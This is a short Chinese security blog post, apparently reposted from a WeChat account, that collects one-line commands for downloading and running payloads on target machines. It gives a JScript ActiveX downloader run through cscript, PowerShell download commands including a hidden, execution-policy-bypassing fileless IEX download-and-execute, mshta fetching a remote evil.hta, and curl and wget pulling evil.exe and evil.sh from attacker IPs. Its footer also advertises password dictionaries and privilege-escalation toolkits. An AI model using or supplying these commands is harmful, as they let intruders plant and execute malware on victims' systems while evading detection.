一句话下载payload总结

2023年2月7日12:19:33评论65 views字数 1024阅读3分24秒阅读模式

js一句话下载payload
windows 全版本都会默认支持 js，并且通过cscript 来调用达到下载 payload 的目的。

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1;
BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody);BinStream.SaveToFile("micropoor.exe");

C:test>cscript /nologo dowfile2.js http://192.168.1.1/eval.exe

还有最简单的powershell

powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.1.115/robots.txt','E:robots.txt')

远程执行命令，且无文件落地：

powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.174.1:1234/evil.txt'))"

远程目标主机上执行以下命令实现下载执行操作，且无文件落地：

mshta http://192.168.174.1:1234/evil.hta

curl

curl http://192.168.174.1:1234/evil.exe -o evil.exe

wget

wget http://192.168.174.1:1234/evil.sh

文章作者: Zeo

文章来源：https://zeo.cool/

扫码加好友拉你进交流群（请备注）

关注公众号，后台回复关键词获取安全相关资源：

【 1868 】：弱口令字典

【 6956 】：Windows提权工具包

【 1762 】：渗透辅助综合工具

【 2595 】：应急响应工具集

【 1346 】：CTF入门到提升视频教程

原文始发于微信公众号（菜鸟学安全）：一句话下载payload总结

左青龙
微信扫一扫

右白虎
微信扫一扫

一句话下载payload总结

PentestDB各种数据库的利用姿势

干货 | 支付金额类漏洞挖掘技巧总结

记一次价格500rmb的短信轰炸

【相关分享】内网信息收集

如何构建自己的自定义 C2 框架

如何使用CsWhispers向C#项目添加DInvoke和间接系统调用方法

深信服防火墙AF策略路由如何配置？

【OSCP】gigachad

CVE-2024-0015复现 (DubheCTF DayDream)

《生成式人工智能服务安全基本要求》原文参阅

发表评论

在线咨询

微信